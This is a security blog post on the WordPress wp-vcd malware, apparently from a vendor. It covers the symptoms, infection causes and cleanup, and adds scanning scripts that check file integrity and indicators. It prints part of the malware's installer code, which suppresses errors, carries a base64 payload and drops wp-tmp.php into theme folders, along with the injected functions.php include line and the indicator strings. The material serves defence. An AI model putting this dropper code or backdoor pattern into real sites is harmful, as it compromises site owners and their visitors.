What is WordPress wp-vcd Malware?

We recently saw a new type of malware infecting WordPress websites by exploiting security holes in outdated plugins and themes. The wp-vcd malware creates backdoors in your website by adding hidden WordPress admin users. Some variants of the malicious code have also been seen to modify core WordPress files and to add new files to the /wp-includes directory.

  1. The wp-vcd malware creates spam URLs on the website (also referred to as URL injection)
  2. The malware creates a backdoor which gives hackers access to your website for extended periods
  3. Hackers exploit vulnerabilities in WordPress plugins and themes to upload the wp-vcd malware to vulnerable sites

Such a hack could have been avoided with a Web Application Firewall (WAF) and regular malware scanning. It is also essential to check for modifications to WordPress core files, plugins and themes.

Reasons for the wp-vcd malware hack

  1. The most common reason for the hack is the use of a nulled theme: in many cases the wp-vcd malware comes bundled with every theme downloaded from nulled theme websites
  2. Outdated WordPress plugins and themes are in use on the site
  3. No Web Application Firewall (WAF) is installed to block hacking attempts


What are the symptoms of wp-vcd malware?

  1. A new WordPress administrator user has been added without your knowledge
  2. Your hosting provider suspended your WordPress account because of the wp-vcd malware attack, to protect other websites
  3. SEO spam such as Japanese search results or a pharma attack in Google search results. Learn more about WordPress spam search results and how to fix them. Below is the screenshot of Google spam search results:
    [Screenshot: wp-vcd hacked results in Google]
  4. Unknown JavaScript code in the source of your website
  5. Pages on your website are being redirected to shady websites
  6. Unknown PHP files in the wp-includes folder which do not exist in the WordPress GitHub repository
  7. PHP files in the wp-content/uploads directory and its sub-directories

Astra Firewall protects your website from all such malware and assures 24×7 security of your website.

Analysis of what the wp-vcd malware does

In the functions.php file within your theme, you would see some code similar to this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This line includes the class.theme-modules.php file, which is what actually installs the wp-vcd malware into the other themes on the server (whether enabled or disabled) and creates all the other malicious files.

Code snippet of the malware code:

<?php

//install_code1
// Suppress all error output so the infection does not show up in logs or on pages
error_reporting(0);
ini_set('display_errors', 0);
// Limits for how deep and how many times the installer walks the directory tree
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
// P is the web root, used as the starting point for the walk
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

// The actual payload is carried as a base64-encoded string of PHP code (truncated in this post)
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...';
...

// Drop the decoded payload as wp-tmp.php: first into the active theme directory,
// and if that fails, into the current working directory
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
        @file_put_contents('wp-tmp.php', $tmpcontent);
    }
}

As discussed in the earlier section, this code also creates a new admin user with a name similar to 100010010. The objective of this backdoor admin account is to make sure the hacker can still access the website even after you delete the malicious code, so that the attackers can return to your website at a later point in time.

How to clean the wp-vcd malware infection

Search your server for the files and strings listed below and examine their contents. Run a diff of each file against the corresponding file in the WordPress core GitHub repository or in the official theme/plugin directory. You can use either of the two approaches (or both), over SSH or from your IDE.
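The diff check described above, as an added example that is not part of the original post: it compares the core files of an installed WordPress tree against a pristine copy of the same version and reports both files whose contents differ and files that exist only in the installed copy. The two trees under $PRISTINE and $SITE are constructed in a temporary directory for this example; in practice $PRISTINE would be a fresh download of the matching WordPress release and $SITE the live document root. It assumes GNU coreutils (sha256sum, join).

```shell
#!/bin/sh
# Added example: core-file integrity check by hash manifest.
# Not code from the original post; paths below are constructed sample data.
export LC_ALL=C

WORK=$(mktemp -d)
PRISTINE="$WORK/pristine"   # clean WordPress release (assumption)
SITE="$WORK/site"           # installed site being checked (assumption)

# Constructed sample trees: one untouched core file, one modified core file,
# and one extra file in wp-includes that WordPress does not ship.
mkdir -p "$PRISTINE/wp-includes" "$SITE/wp-includes"
printf '<?php // clean core file\n' > "$PRISTINE/wp-includes/version.php"
cp "$PRISTINE/wp-includes/version.php" "$SITE/wp-includes/version.php"
printf '<?php // clean core file\n' > "$PRISTINE/wp-includes/post.php"
printf '<?php // core file with injected code\n' > "$SITE/wp-includes/post.php"
printf '<?php // not shipped by WordPress\n' > "$SITE/wp-includes/wp-vcd.php"

# Build a "relative-path sha256" manifest, sorted by path, for every file
# under the given directory.
manifest() {
    (cd "$1" && find . -type f | sort | while IFS= read -r f; do
        printf '%s %s\n' "$f" "$(sha256sum "$f" | cut -d' ' -f1)"
    done)
}

manifest "$PRISTINE" > "$WORK/pristine.txt"
manifest "$SITE"     > "$WORK/site.txt"

# Core files present in both trees whose hashes differ: modified on the site.
modified_core_files() {
    join "$WORK/pristine.txt" "$WORK/site.txt" | awk '$2 != $3 {print $1}'
}

# Files present only on the site, restricted to the core directories where
# no legitimate extra files belong (wp-includes and wp-admin).
extra_core_files() {
    join -v2 "$WORK/pristine.txt" "$WORK/site.txt" \
        | awk '$1 ~ /^\.\/(wp-includes|wp-admin)\// {print $1}'
}

echo "Modified core files:"
modified_core_files
echo "Extra files in core directories:"
extra_core_files
```

Files reported by either function are the ones to open and diff line by line; a modified core file is replaced from the pristine copy, and an extra file in wp-includes or wp-admin is inspected and removed. The same manifest, saved after a clean install, is what a periodic monitoring job can compare against later.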

Approach 1 – Search for files on the server that are usually infected with the wp-vcd hack

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
  4. class.theme-modules.php
  5. class.wp.php
  6. admin.txt
  7. codexc.txt
  8. code1.php
  9. class.theme-modules.php (inside the theme folder)

Approach 2 – Search for string patterns that are found in infected malware files

  1. tmpcontentx
  2. function wp_temp_setupx
  3. wp-tmp.php
  4. derna.top/code.php
  5. stripos($tmpcontent, $wp_auth_key)
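Approach 1 and Approach 2 together, plus the "PHP files under wp-content/uploads" symptom from the list above, as an added example that is not part of the original post: a script that scans a WordPress document root for the listed file names and string patterns. The site tree under $ROOT, including the infected theme and the dropped files, is constructed here as sample data; the include line from the functions.php section of the post is added to the string list so that the infected functions.php is also reported.

```shell
#!/bin/sh
# Added example: indicator scan for wp-vcd file names and strings.
# Not code from the original post; the sample site below is constructed.
export LC_ALL=C
ROOT=$(mktemp -d)   # document root being scanned (constructed)

# Constructed sample site: an infected theme, a clean theme, a dropped
# wp-includes/wp-tmp.php and a PHP file inside the uploads directory.
mkdir -p "$ROOT/wp-includes" "$ROOT/wp-content/themes/infected" \
         "$ROOT/wp-content/themes/clean" "$ROOT/wp-content/uploads/2019/01"
cat > "$ROOT/wp-content/themes/infected/functions.php" <<'EOF'
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>
EOF
printf '<?php function wp_temp_setupx($phpCode) { /* constructed */ } ?>\n' \
    > "$ROOT/wp-content/themes/infected/class.theme-modules.php"
printf '<?php // theme code, nothing suspicious\n' \
    > "$ROOT/wp-content/themes/clean/functions.php"
printf '<?php $tmpcontentx = "constructed"; ?>\n' > "$ROOT/wp-includes/wp-tmp.php"
printf '<?php // PHP file that should never be in uploads (constructed)\n' \
    > "$ROOT/wp-content/uploads/2019/01/x.php"

# Approach 1: file names the wp-vcd variants are known to create.
SUSPECT_NAMES='wp-vcd.php wp-tmp.php class.theme-modules.php class.wp.php admin.txt codexc.txt code1.php'

# Approach 2: string patterns found inside infected files. The last entry is
# the theme include line from the functions.php section (added here).
SUSPECT_STRINGS='tmpcontentx
function wp_temp_setupx
wp-tmp.php
derna.top/code.php
stripos($tmpcontent, $wp_auth_key)
class.theme-modules.php'

# List files whose base name matches one of the known malware file names.
suspect_files() {
    for n in $SUSPECT_NAMES; do
        find "$1" -type f -name "$n"
    done | sort
}

# List files containing any indicator string. -F makes the match literal,
# so '$' and '(' in the patterns are not treated as regex metacharacters.
suspect_strings() {
    printf '%s\n' "$SUSPECT_STRINGS" | grep -rlFf - "$1" 2>/dev/null | sort
}

# PHP files under wp-content/uploads should not exist at all.
uploads_php() {
    find "$1/wp-content/uploads" -type f -name '*.php' | sort
}

echo "== Known malware file names =="; suspect_files "$ROOT"
echo "== Files containing indicator strings =="; suspect_strings "$ROOT"
echo "== PHP files in uploads =="; uploads_php "$ROOT"
```

Every path printed is a candidate to open and compare against the original theme, plugin or core file before deleting it; functions.php in particular is legitimate in every theme and only the injected include line should be removed. Because the malware copies itself into every installed theme, the scan has to cover wp-content/themes as a whole, not just the active theme.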

How to protect WordPress and stay secure from the backdoor

  1. Create a simple security strategy:
    1. Clean – Make sure your website files and database are 100% clean and malware free
    2. Protect – Install a Web Application Firewall (WAF) to block re-infection attempts
    3. Monitor – Run regular malware scans to check whether files or the database have been tampered with
  2. Delete unused WordPress themes (even if disabled)
  3. Completely avoid nulled themes on your website
  4. Update WordPress core, plugins and themes

Cleaning websites infected with such malware is not always easy. Once activated on a website, the malware tends to spread to other areas of the site by installing different kinds of malicious code. This particular malware also creates a backdoor which gives the attackers complete control of your site. Hence, it is important to follow a security strategy that thoroughly analyses your website and then completely removes the hack from it.



About The Author

Ananda Krishna

Ananda is a security researcher at Astra.

4 Comments

  1. Thank you for this informative read, I have shared it on Twitter.

  2. thank you very much for the detailed explanation.

    I have a question,

    I have cleaned the functions.php file from the snippet and deleted the wp-vcd.php file.
    I searched through the SQL for all the string patterns and found nothing.

    Does it mean I’m safe?

  3. That’s a really good point this Article is very helpful and informative. Thanks for sharing

  4. Thank you for this useful article, that helped me a lot
